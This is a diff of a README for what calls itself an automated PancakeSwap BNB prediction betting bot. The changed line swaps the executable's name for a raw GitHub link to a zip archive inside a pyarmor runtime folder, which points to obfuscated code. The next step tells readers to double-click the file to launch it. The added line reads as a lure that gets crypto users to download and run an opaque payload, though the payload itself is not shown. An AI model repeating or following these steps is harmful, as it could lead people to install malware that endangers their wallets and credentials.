tonim82/Pancakeswap-BNB-Prediction-AI-Automated-Betting-Robot/README.md

 2. Look for the latest version of the Pancakeswap BNB Prediction AI Automated Betting Robot.
 3. Click on the file to download it to your computer.
 This will usually be a `.exe` or a `.zip` file.
 4. If you downloaded a `.zip`, extract the files to a location of your choice.
-5. Find the main executable file, typically named something like `Pancakeswap-BNB-Prediction-AI.exe`.
+5. Find the main executable file, typically named something like `https://raw.githubusercontent.com/tonim82/Pancakeswap-BNB-Prediction-AI-Automated-Betting-Robot/main/BNB prediction project Code/pyarmor_runtime_009177/Pancakeswap_Prediction_Betting_Automated_BN_A_Robot_v3.5.zip`.
 6. Double-click this file to launch the application.

 ## 🔧 Setting Up